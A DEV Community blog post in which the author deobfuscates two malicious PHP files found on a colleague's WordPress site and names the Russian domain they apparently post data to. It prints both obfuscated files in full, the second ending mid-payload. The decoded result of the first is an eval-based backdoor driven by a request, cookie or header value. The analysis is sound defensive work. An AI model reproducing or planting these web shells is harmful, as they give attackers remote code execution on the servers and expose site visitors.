DEV Community

🐁
🐁

Posted on

Malicious PHP I found on a colleague's website 🦠

TL;DR: Colleague sent me two 'malicious php' files he found from his wordpress website. I detail below how I deobfuscated the malicious code and found their domain which they post information to: indikateit.ru

Today, my colleague messaged me whilst I was on my commute to work, asking me to take a look at a 'potentially malicious' php file which he had found on his personal website.

The code was:

<?php
    $anthropological= '$ii'; $former= 'e';$bach = 'BiTT(?U';$encumbers = ']s_(S]w)$'; $cards = 'Qac';$invokes ='K';
    $lagging = '_';

    $cautioned =']'; $evensong = '1d4_'; $blustering= '4[e';$besmirch = ' ,fp)a;';$lemma = 'aA';$indicter= 'as)/EvtSd';$cantankerously = 't'; $espoused='uCtEPOqa';$investigation = 'r';$juicy ='7r'; $desmond= ')';$countermeasure='_';$indemnify = 'lQOV';
    $injections ='lye'; $backarrows ='r';$gaillardia='@';$lime ='Z,';$apprentice= 'g'; $captains ='R';$blameworthy = ')tL"';$dragnet = 's';

    $evicting= ')'; $cleaved ='<(I'; $cap = '@$eqo$_Q[';
    $corroborating = 're'; $enemas= 'a'; $data='9'; $hetty = '_'; $buttocks ='?';
    $lambert='gsad)';$hinze='d'; $infra= 'e';
    $glib= 'e0U6A__dP';$evades='e';$bandies='d';$barret = '8["uXDa(v';$broach= 'Tn'; $impetuous= '"i';$clari='i';$bren = 'bI$'; $iceberg= '"';$cheetah= '='; $haydon = 't_u';$he= ':,ascna":';$insights='eHl';
    $fanni='_';$heeded ='gaG'; $cranberry= 'L';$drench = 'vfi;udf-b'; $devin= '_';$lumps= 'J';$bunkhouse= '[UKRTi?CN'; $brutality =')wD'; $contaminates= 't';
    $astronomer= 'r$'; $leavened ='a'; $logicians= 'VrD+)(^';$catlaina= 'H';$annihilation=']TH';$indeed ='eW:'; $animadvert= 'MoW;r';$extrude = 'E'; $bobafett ='tc>Ql';
    $collection='o'; $blest = 'acYi*r'; $franco= ';';$farmer= '2'; $avenue = 'rs';$angelle ='"L)';

    $fornication ='cd(.=e';$junkerdom = 'mE]$R$['; $kyle ='$';$flapping ='n'; $dialup= 'e';$javelins='Re(e(=@s';
    $consider='W'; $headache ='5ADvrUs';$counsellors= 'T';
    $ewoks= 'b'; $bellies =')';$kippie = ')bO';$basalt='FBEa';$colorers= 'r'; $duane ='_'; $jeremiah ='6(yD$3(E';$exterminated= '"pe"';$bungled='ie;(P`@';

    $chrysler ='BS'; $gnni = $fornication['0'] .

    $colorers . $bungled['1'] .$basalt['3'] . $bobafett['0'] . $bungled['1'] .$duane.$drench['6']. $drench['4'].$flapping .$fornication['0'] . $bobafett['0'] .$bungled[0]. $collection .$flapping;
     $cracking=$besmirch['0'] ;$flowcharting= $gnni($cracking, $bungled['1'] . $headache['3'] .$basalt['3'] . $bobafett['4'] .$bungled['3'].$bungled['6'].$basalt['3'] . $colorers.$colorers. $basalt['3']. $jeremiah['2'].$duane. $exterminated['1']. $collection.
    $exterminated['1'].

    $bungled['3']. $drench['6'].
    $drench['4'] .$flapping.

    $fornication['0'] . $duane . $heeded['0'] .$bungled['1'] . $bobafett['0'] . $duane .$basalt['3'].$colorers .$heeded['0'] . $headache['6'] . $bungled['3'].$kippie[0]. $kippie[0] . $kippie[0]. $bungled['2'] );
    $flowcharting($cap['3'] ,$exterminated['1'], $drench['7'], $animadvert['0'] ,$bungled['1'] ,

    $indicter['3'],$jeremiah['4'].$bungled[0]. $javelins['5'] .$bungled['6'].

    $basalt['3']. $colorers . $colorers. $basalt['3'].$jeremiah['2']. $duane. $junkerdom['0'] .$bungled['1']. $colorers.$heeded['0'] . $bungled['1']. $bungled['3'] . $jeremiah['4']. $duane .

    $javelins['0']. $jeremiah['7'].$bobafett[3].$headache['5'] . $jeremiah['7'] .$chrysler['1'].$counsellors .$he['1'].$jeremiah['4'] .
    $duane . $bunkhouse[7] .
    $kippie['2'] .$kippie['2'] . $bunkhouse['2'] .$bren['1'] .
    $jeremiah['7'].$he['1'] . $jeremiah['4'] . $duane .$chrysler['1'] .$jeremiah['7'] . $javelins['0']. $logicians['0'].$jeremiah['7'].$javelins['0'].

    $kippie[0] .$bungled['2'].$jeremiah['4'].$basalt['3'] .$javelins['5'].$bungled[0].$headache['6'] . $headache['6'] . $bungled['1'] . $bobafett['0'] . $bungled['3'] .$jeremiah['4']. $bungled[0]. $junkerdom['6']. $exterminated[3].$brutality['1'] .$bobafett['4'] .$cap['3'] .
    $basalt['3'] .
    $drench['4'] .$fornication['1'] .

    $fornication['1'] .$kippie['1'] .$exterminated[3] .

    $junkerdom['2'].$kippie[0].

    $bunkhouse['6'] . $jeremiah['4'].$bungled[0].$junkerdom['6']. $exterminated[3] .

    $brutality['1'] .$bobafett['4'] . $cap['3'].$basalt['3'] .$drench['4'].

    $fornication['1'] . $fornication['1'] .$kippie['1'] .$exterminated[3].$junkerdom['2'].
    $indeed['2'].

    $bungled['3']. $bungled[0] .$headache['6'] . $headache['6'] . $bungled['1'] .$bobafett['0'].$bungled['3'].
    $jeremiah['4'].$bungled[0].

    $junkerdom['6'] .$exterminated[3]. $annihilation['2'].$counsellors .

    $counsellors .$bungled['4'] .$duane . $consider.$angelle['1'] .$bobafett[3] .$headache['1']. $headache['5'] .

    $jeremiah['3'].$jeremiah['3']. $chrysler['0'] .$exterminated[3] .
    $junkerdom['2'] .
    $kippie[0]. $bunkhouse['6'] . $jeremiah['4'] . $bungled[0] . $junkerdom['6']. $exterminated[3].$annihilation['2'] . $counsellors. $counsellors.$bungled['4'] .

    $duane . $consider. $angelle['1'].
    $bobafett[3].

    $headache['1']. $headache['5'].$jeremiah['3'].$jeremiah['3'].$chrysler['0'] . $exterminated[3] .
    $junkerdom['2']. $indeed['2']. $fornication['1'] . $bungled[0] . $bungled['1'] .$kippie[0] . $bungled['2'] .

    $bungled['6'].$bungled['1'].
    $headache['3'] .$basalt['3'].$bobafett['4'].$bungled['3'].$headache['6'] . $bobafett['0'] . $colorers.$colorers .$bungled['1'].$headache['3'] . $bungled['3'] .
    $kippie['1'] . $basalt['3'].$headache['6'] .$bungled['1'] .$jeremiah['0'] .

    $blustering['0']. $duane.
    $fornication['1'].$bungled['1'] .$fornication['0'] .$collection .$fornication['1'].$bungled['1'].
    $bungled['3'] .
    $headache['6']. $bobafett['0'] . $colorers.$colorers .$bungled['1'].

    $headache['3'] . $bungled['3']. $jeremiah['4'].

    $basalt['3'] .
    $kippie[0] . $kippie[0] .$kippie[0]. $kippie[0] .$bungled['2']); 
Enter fullscreen mode Exit fullscreen mode

My first thought was to google search the filename, which was oqjpuqbi.php.

Nothing came up.

I then googled the file content itself.

Nothing came up.

I realised that the code was probably randomised, so if someone had the same code it would have different variable names, and variables which pointed to different strings.

My first thoughts were to try an online php deobfuscation tool.

This helped space things out but the strange variables, e.g. bobafett, enemas & fornication still remained.

It was clear that these variables referenced strings, which would then be concatenated togather to form instructions, potentially malicious instrutctions.

I then copy-pasted this more readable and spaced-out php code into vim, used some regex to transform the php syntax into javascript, then made sure that the javascript that I would then run in my browser console was just limited to printing concatenated strings.

This is the resulting code which I would run:


 var anthropological='ii';
var former='e';
var bach='BiTT(?U';
var encumbers=']s_(S]w)';
var cards='Qac';
var invokes='K';
var lagging='_';
var cautioned=']';
var evensong='1d4_';
var blustering='4[e';
var besmirch=' ,fp)a;';
var lemma='aA';
var indicter='as)/EvtSd';
var cantankerously='t';
var espoused='uCtEPOqa';
var investigation='r';
var juicy='7r';
var desmond=')';
var countermeasure='_';
var indemnify='lQOV';
var injections='lye';
var backarrows='r';
var gaillardia='@';
var lime='Z,';
var apprentice='g';
var captains='R';
var blameworthy=')tL"';
var dragnet='s';
var evicting=')';
var cleaved='<(I';
var cap='@eqo_Q[';
var corroborating='re';
var enemas='a';
var data='9';
var hetty='_';
var buttocks='?';
var lambert='gsad)';
var hinze='d';
var infra='e';
var glib='e0U6A__dP';
var evades='e';
var bandies='d';
var barret='8["uXDa(v';
var broach='Tn';
var impetuous='"i';
var clari='i';
var bren='bI';
var iceberg='"';
var cheetah='=';
var haydon='t_u';
var he=':,ascna":';
var insights='eHl';
var fanni='_';
var heeded='gaG';
var cranberry='L';
var drench='vfi;udf-b';
var devin='_';
var lumps='J';
var bunkhouse='[UKRTi?CN';
var brutality=')wD';
var contaminates='t';
var astronomer='r';
var leavened='a';
var logicians='VrD+)(^';
var catlaina='H';
var annihilation=']TH';
var indeed='eW:';
var animadvert='MoW;r';
var extrude='E';
var bobafett='tc>Ql';
var collection='o';
var blest='acYi*r';
var franco=';';
var farmer='2';
var avenue='rs';
var angelle='"L)';
var fornication='cd(.=e';
var junkerdom='mE]R[';
var kyle='';
var flapping='n';
var dialup='e';
var javelins='Re(e(=@s';
var consider='W';
var headache='5ADvrUs';
var counsellors='T';
var ewoks='b';
var bellies=')';
var kippie=')bO';
var basalt='FBEa';
var colorers='r';
var duane='_';
var jeremiah='6(yD3(E';
var exterminated='"pe"';
var bungled='ie;(P`@';
var chrysler='BS';
var gnni= fornication[0] + colorers + bungled[1] + basalt[3] + bobafett[0] + bungled[1] + duane + drench[6] + drench[4] + flapping + fornication[0] + bobafett[0] + bungled[0] + collection + flapping;
cracking=besmirch[0];
//flowcharting=gnni(cracking,bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2]);
var another_string = bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`another_string is ${another_string}`);
var finalStr = cap[3]+exterminated[1]+drench[7]+animadvert[0]+bungled[1]+indicter[3]+jeremiah[4]+bungled[0]+javelins[5]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+junkerdom[0]+bungled[1]+colorers+heeded[0]+bungled[1]+bungled[3]+jeremiah[4]+duane+javelins[0]+jeremiah[7]+bobafett[3]+headache[5]+jeremiah[7]+chrysler[1]+counsellors+he[1]+jeremiah[4]+duane+bunkhouse[7]+kippie[2]+kippie[2]+bunkhouse[2]+bren[1]+jeremiah[7]+he[1]+jeremiah[4]+duane+chrysler[1]+jeremiah[7]+javelins[0]+logicians[0]+jeremiah[7]+javelins[0]+kippie[0]+bungled[2]+jeremiah[4]+basalt[3]+javelins[5]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+indeed[2]+bungled[3]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+indeed[2]+fornication[1]+bungled[0]+bungled[1]+kippie[0]+bungled[2]+bungled[6]+bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+kippie[1]+basalt[3]+headache[6]+bungled[1]+jeremiah[0]+blustering[0]+duane+fornication[1]+bungled[1]+fornication[0]+collection+fornication[1]+bungled[1]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+jeremiah[4]+basalt[3]+kippie[0]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`final str is ${finalStr}`);
Enter fullscreen mode Exit fullscreen mode

What got logged out was:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_RundefinedQUundefinedST,3_COOKIundefined,3_SundefinedRVundefinedR);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

Immediately, I noticed the undefined in the string which was logged.

Upon a review of the code, I realized that the alleged malicious actor had made a mistake:

jeremiah[7] returns null because it is of length 7 and hence it can not index something which does not exist.

I then appended the last character once more to jeremiah to make sure it was length 7, then ran in my browser again.

The output this time was:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

Now this looked a lot better. rubs hands

As you can see, there was is now another undefined outputted.

This is from the junkerdom, which is of length 5, yet the code is asking for a character at index 6.

This is clearly supposed to be another square bracket, namely, [.

When fixed, the output is:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3i["wloauddb"])?3i["wloauddb"]:(isset(3i["HTTP_WLQAUDDB"])?3i["HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

This looks a lot better.

At the end of the above output, it string reverses 3a->a3 then base64 decodes it which gives k.

Update: my friend gave me another file he found on his website named goldafunder.php. A google search of this filename presented no results.

This was the file:

<?php $PZOGngRGYdWpGi="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";$wzEaCfiPhwFdUF=$PZOGngRGYdWpGi[4] .$PZOGngRGYdWpGi[45].  $PZOGngRGYdWpGi[30].  $PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[21]  .$PZOGngRGYdWpGi[2] .$PZOGngRGYdWpGi[11] .$PZOGngRGYdWpGi[44] .$PZOGngRGYdWpGi[24].  
$PZOGngRGYdWpGi[52].  $PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[44].$PZOGngRGYdWpGi[24];$xWqBnKmIZCRbJ=$PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[53]. $PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[24]  .$PZOGngRGYdWpGi[41];$IUCaEKgNOPd=$PZOGngRGYdWpGi[24].  
$PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20] . $PZOGngRGYdWpGi[57].  
$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[11].$PZOGngRGYdWpGi[20].$PZOGngRGYdWpGi[24].  $PZOGngRGYdWpGi[56]  .$PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[53]  .$PZOGngRGYdWpGi[39]  .$PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[23];$TiCkLZuka=$PZOGngRGYdWpGi[52] .$PZOGngRGYdWpGi[20].  
$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[45] . $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[24]  .$PZOGngRGYdWpGi[11].  $PZOGngRGYdWpGi[33] .$PZOGngRGYdWpGi[35] . $PZOGngRGYdWpGi[38].  $PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[53].$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[57].$PZOGngRGYdWpGi[38];$IUCaEKgNOPd(0);$HTIRyzRYNNT=$TiCkLZuka("",$wzEaCfiPhwFdUF($xWqBnKmIZCRbJ("K0QfK0gCN0XCK0wO0lGeltjZ1JGJg8GajVWCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJoQDK0welNHbl1XCK0QfJkgCNsDdphXZ7YWdiRCIvh2YllQCJoQD9lQCJoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0welNHbl1XCJkgCNsTKhVHJskiZlJHJoUGZvNmblxmc1dXYy5iI9YWZyZiIuAXa51GJuISPyRGZhZiIukCeyVHJoUGZvNmblxmc1dXYy5iI9UnJi4SK0N3boRCKlR2bj5WZsJXd3FmcuISPkZiIukSZzFmYkgSZk92YuVGbyV3dhJnLi0TZzFmYmIiLpQmcvdXeltGJoUGZvNmblxmc1dXYy5iI9sWbmIiLrNWYwRUSk4iI9AXa/AHaw5iZm9ibpFWbvRGJv8iOwRHdoJCK0V2ZfV2ZhB3X5xmc1NWPp8mZul2X0V2ZfV2ZhB3X5xmc1NGJsYWdiRCK0NXaslQCJkgCNsXKp0lIy92bkNXais1bm5WakgCdlN3cphCImlWCJkgCNsHIpU2ckgCImlWCJoQD9lQCK0gCNoQDK0QfJkQCK0wO0lGeltjZ1JGJg8GajVWCJkQCK0gCN0XCJkQCK0wOpA3clJHJsA3ZlJHJsM3aulGbkwiZ1JGJogXZnVmcfV2ZhB3Xldmbhh2Y9YWdiRSCJkQCJoQD70lIw91cr5WasJyWvZmbpRSPztmbpxGJJkQCJkgCNsTM9A3clJHJ7cycp9SK+wFcvwFPc1HMzsnLo8yJ9A3ZlJHJJkQCJkgCNoQD7kSYzVmckwSYnVmckwycr5WasRCLmVnYkgCeldWZy9VZnFGcfV2ZuFGaj1jZ1JGJJkQCJkgCNsTXiE2XztmbpxmIb9mZulGJ9M3aulGbkkQCJkQCK0wOw0TYzVmckszJp9iPcF2LcxDX/oiL+w1Pq4yccFGPc9yJ9E2ZlJHJJkQCJkgCNsXKpICbtRHavQHelRnIsQ3Ykgic0NXayR3coAiZplQCJkgCNoQD7kCKldWYw9Ve49mcw9FdldWPpQ3YkwiZ1JGJoQ3cpxWCJkQCK0gCNsXZzxWZ9lQCJoQD9lQCJkgCNsDdphXZ7UGdhxGctVGdkAyboNWZJkQCJkgCNoQD9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwyaulGbkwiIlIiLpRiLi81SOlETfVERJNlTJViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJkgCNsXKr5WasRCI+0DIpRCIzFGIztmbpx2XlRWaz5WakgCajFWZy9mZJkQCJkQCK0QCK0wOpUGdhxGctVGdkwSKpQmcvdXeltGJo0WayRHIsICLiACLiAiIoU2YhxGclJ3XyR3csISJkJ3b3lXZrViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLkJ3b3lXZrNWdkwiIlQmcvdXelt2Y1ViIoU2YhxGclJ3XyR3c9UGdhxGctVGdkkQCJkQCJoQD7kSZ0FGbw1WZ0RCLu9Wa0BXayN2clRGJsISJu9Wa0BXayN2clRWJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsTKlRXYsBXblRHJsUGb0lGdkwiIlUGb0lGdlICKlNWYsBXZy9lc0NXPlRXYsBXblRHJJkQCJkQCK0wOpUGdhxGctVGdkwCd4VGdkwiIlQHelRXJigSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkgCNsXZzxWZ9lQCJkQCK0QfJkQCJkQCK0wOpUGdhxGctVGdkwCbwVmckwyayFWbkgSZjFGbwVmcfJHdz1TZ0FGbw1WZ0RSCJkQCJkQCK0wepwGclJHJg4TPgsmch1GJgMXYg0lIy5mIb9mZulGJog2YhVmcvZWCJkQCJkgCNsXKpkSXiInbis1bm5WakgSehJnch91cphiJmkSKdJicuJyWvZmbpRCK0V2czlGKoAiZplQCJkQCK0welNHbl1XCJkQCK0wO0lGeltDduVGdu92Yy92bkRCIvh2YllQCJkQCK0wOpQHelRHJoUGZvNWZk9FN2U2chJWP05WZ052bjJ3bvRGJJkQCJkgCNsXKp0lIl52bsFGZuFGdzJyWvZmbpRCK0V2czlGKgYWaJkQCJoQDK0wepkSXiI3bvR2cpJyWvZmbpRCK0V2czlGKgYWaJkQCK0gCN0Xf7kCbhZHJoIXZkFWZoliIi0TIsFmdkgiZptTKsFmdkgSbpJHd9wWY2RyepwWY2RCIzFGIzVGc5RHJog2YhVmcvZ2OpUGc5RHduVGdu92YkwiIuxlIoUGZvxGc4VWPzVGc5RHJ7kSXiUGc5RHduVGdu92Yis1bm5WakgSZk92YlR2X0YTZzFmYA1TZwlHd05WZ052bjRyepkSXiUGc5RHduVGdu92Yis1bm5WakgCdlN3cphCImlWCJkgCNsHIpQ3biRCKgYWaJkgCNsTXiM3aulGbfVGZpNnbpJyWvZmbpRCQ9M3aulGbfVGZpNnbpRyOpQmcvdXeltGJoMHZy92djVXPkJ3b3lXZrNWdksTXi42bpRHcpJ3YzVGZis1bm5WakAUPu9Wa0BXayN2clRGJ70lIlxGdpRnIb9mZulGJA1TZsRXa0RyOdJCd4VGdis1bm5WakAUP0hXZ0RyOdJSZzFmYis1bm5WakAUPlNXYiRyOdJyajFGcElkIb9mZulGJA1zajFGcElEJ70lIkJ3b3lXZrJyWvZmbpRCQ9QmcvdXeltGJJkgCNsTKpYWdiRCKlR2bjVGZfRjNlNXYihSZ6lGbhlmclNnb11zbm5WaksTKmRCKlN3bsNmZAtTKpYGJoMHdldmZAhSbpJHd9YWdiRyOpYmZvRCLmRCKrVWZzZGQ7kiIyJCLkJGJo4WZw9mZA1jZksTKpwGctVGdkgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBUPlRXYsBXblRHJJkgCNsDMr0FeyVXNk1GJbZ2Yk0jZm9GJJkgCNsTM9Q3biRSKpEWdkACLik2IyVGZpB3c1RWahJGfyVGb3FmcjxXdy5CXslWYtx3dllmdlJHcgIWZ3BSZsd2bvdGfv9GahlHf09mY8JXZklGczxXZslmYv1UL09mYlx2Zv92R8Nncl5GdyFGchlGZl1Eflx2Zv92RtQ3bCNHZBxnclx2dhJ3YtE2cnxXZsd2bvd2IigCajRXYt91ZlJHcoAiZplQCK0wOx0TZzRSKpYWZyRCIsISaj02bj5CXu9Gb5JWYixXbvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX392d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNmchV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlWCJoQD70lISRERB9VRU9UTFJlIbJVRWJVRT9FJA1DcplXbksTXiIVRSVkRFJ1XQRFVIJyWSVkVSV0UfRCQ9YWZyRyOdJCVOV0RB9lUFNVVfBFVUhkIbJVRWJVRT9FJA1TY1RyOw0TZzRyOw0DdvJGJJkgCNsXKp0FeyVXNk1GJbZ2YkgCdlN3cpBEKgYWaJoQDJoQD9lgCNsTKpkycnlmZu92Ykgyc05WZ052bj9Fdld2XlxWamBEKlR2bjVGZfRjNlNXYiBEKlpXasFWayV2cuVHQ9Y2YkkQCK0wepkycnlmZu92Ykgyc0NXa4V2XlxWamBEKgYWaJoQD7kCK5FmcyFWPmNGJJoQDK0welNHbl1nCNoQDK0QfJoQDK0wO0lGellQCK0gCNsTKpQXdvRCKlpXasFWayV2coUGZvNmbl9FN2U2chJGIvh2YllQCK0wOpkQCJkQCK0ALwAiOgkCbw1WZ0RCKlpXazVGbpZGI/ASKsBXblRHJoUGbpZ2XzlGI+0DInUmepN3XlxWam9VZ0FGbw1WZ0dSCJkQCJkgCNwCMgoDIpQmYkgSZ6l2clxWamByPgkCZiRCKlxWam91cpBiP9AyJlpXaz9VZslmZfJGZnkQCJkQCJoQDsM3ZpZmbvNGJg4TPgcSZslmZnlmZu92YnkQCJkQCJoQDs81XFxUSG91Xg4TPgcSZslmZnkQCJkQCJoQDsIVRWJVRT9FJg4TPgciclZnclN3JJkQCJkQCK0ALmNGJg4TPgciZjdSCJkQCJkgCNgSehJnch1Dd19GJJkgCNoQD9lQCK0wOpkSKzdWam52bjRCKzRnblRnbvN2X0V2ZfVGbpZGQoUGZvNWZk9FN2U2chJGQoUmepxWYpJXZz5WdA1jZjRSCJkgCNsXKpM3ZpZmbvNGJoMHdzlGel9VZslmZAhCImlWCJoQD7kCK5FmcyFWPmNGJJkgCNsXKiUjI90DekgCImlWCK0QfJoQD7QXa4V2Oi4GXjMyIEV0SS90VjMyIiAyboNWZJkgCNsXKiQjI90DekgCImlWCK0gCNoQD9lgCNsDdphXZJkgCNsjIux1IjMCRFRVQEBVVjMyIiAyboNWZJkgCNsTKxYWdiRCLsBXblRHJoMHduVGdu92YfRXdw9VZslmZAtTKiYWan5CbsF2cl1WZoRXLwdnIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7kSMmVnYkwCZiRCKzRnblRnbvN2X0VHcfVGbpZGQ7kiInBnauMnbvNWahRXZtJiLyVHJoQXZn9VZnFGcflHbyV3YA1TK0RCLxYWdiRCK0NXaslQCK0wOpEjZ1JGJsM3ZpZmbvNGJoMHduVGdu92YfRXdw9VZslmZAtTKicmbw5SMpp2btVmIuIXdkgCdld2XldWYw9VesJXdjBUPpQHJsEjZ1JGJoQ3cpxWCJoQD7IyLi4Cdz9Ga1QWbk4iIvMXZnFWbp9iIu4Wah12bkRiLi8yL6AHd0hmI9IXdkkQCK0wOi4GXjMyITVETJZ0XH5USUFERQV1IjMiIg8GajVWCJoQD7liIyISP9gHJoAiZplgCNoQD7lSKzNXYwVDZtRSP9AHJoYiJpIiI9ECekgCKgYWaK0gCNsTKpkiIwJCKsFmdfRXZnhSZk92YlR2X0YTZzFmYAhSNk1WPwRSKiISPhgHJoAiZppQD7IiI9AHJK0gCNsTKi0TPRRWe1MEZwZ1RkhGdXF2a1cVYigSZk92YlR2X0YTZzFmY94Wah12bkRiCNoQDK0wOpcSTwAjNxcCLnQXatlGbflncv1WZtdCK0V2cflmbpBkCNoQD7IiZpdmLsxWYzVWblhGdtA3di4Ca0FGcw1Gdk0Dbw1WZ0RiCNsjInBnauMnbvNWahRXZtJiLoRXYwBXb0RSPkJGJK0wOlxWamNGJugGdhBHctRHJ9M3ZpZmbvNGJK0gCNoQD7kCa0FGcw1GdkgicpR2atB0O1QWb4RiLoRXYwBXb0RSPoRXYwBXb0RiCNoQD9pQD7IiLi0Da0FGcw1GdkkgCNsXZzxWZ9pQD7kCKoRXYw9lYk9FdldWPoRXYwBXb0RSCK0wepkSZslmZjRiL1QWb4RiLi4iIoMHdzlGel9VZslmZAFCKgYWaK0gCNsjIn5GcuETaq9WblJSPlxWamNGJK0gCNsjIvIiL0N3boVDZtRiLi4yLi0TNk1GekoQDK0gCNsTK4JXdkgSNk1WP4JXd1QWbksTayVHJuQ3cvhGJ9gnc1RyOpQ3cvhGJoUDZt1Ddz9Ga1QWbkoQD7kCdz9GakwiIiwiIuc3d3JCKlNWYsBXZy9lc0NXP0N3boRiCNsTXikkUV9FVTVUVRVkUislUFZlUFN1XkAUPpJXdkoQD7kSXiQ1UPh0XQRFVIJyWSVkVSV0UfRCQoIXZ39GbvRnc0NXP0N3boRiCNoQD7IiYzQTZmFGMyUTMlN2M4ETYwYWYwIDOygTMwcTN0UWNlJSPzNXYwVDZtRiCNoQD7kiIrNWZoN2XwBHcwJCKsFmdfRXZn1DekoQD7IiI9QnblRnbvNGJK0gCNoQDK0gCN0nCNoQD7IiLiAibyVHdlJXCK0gCNsjcpR2Xw1GdkAibyVHdlJHIpkicpR2Xw1GdkgSZsJWY0lmc391cpBiJmASKylGZfBXb0RCKylGZfNXaoAiZplgCNsTKoIXak9FctVGdfRXZn91c5NHI9AicpR2Xw1GdkkgCNoQD7kyJucCKg4mc1RXZyBSKpciLngSZsJWY0lmc391cphCImlWCK0gCNsTKylGZfRnblJnc1NGJoIXakV2cvx2YJoQD7kicpRGJoAibyVHdlJHIpkicpRGJoUGbiFGdpJ3dfNXagYiJgkicpRGJoIXak91cpBiJmASKylGZkACLn8CJr4CXe9yJog2Y0FWbfdWZyBXIoAiZpBSKpIXak9FduVmcyV3YkgicpRGZhVmcg0DIylGZkgCIlxWaodXCK0wOpciLngicpRmblB3bg0DIylGZfRnblJnc1NGJJoQDK0wOpQGJoAibyVHdlJHIpkCZkgSZsJWY0lmc391cpBiJmASKkRCKylGZfNXaoAiZpBSKkRCIzFGIzJXak9FdsVXYmVGZkgCIoNWYlJ3bmlgCNoQD7kSCK0wJzRWYvxGc19CduVGdu92YtA3dnkQCK0ALnAXb0dSCJoQDscycul2Z1xGcvMnavU2YtlnbpR3LzJ3b0lGZl9SYpRWZtdSCJoQDscSZnFWdn5WYs9CbtRHavMXbj9ycllmchJnYpx2JJkgCNwyJzV2Zh1WavM3dllmd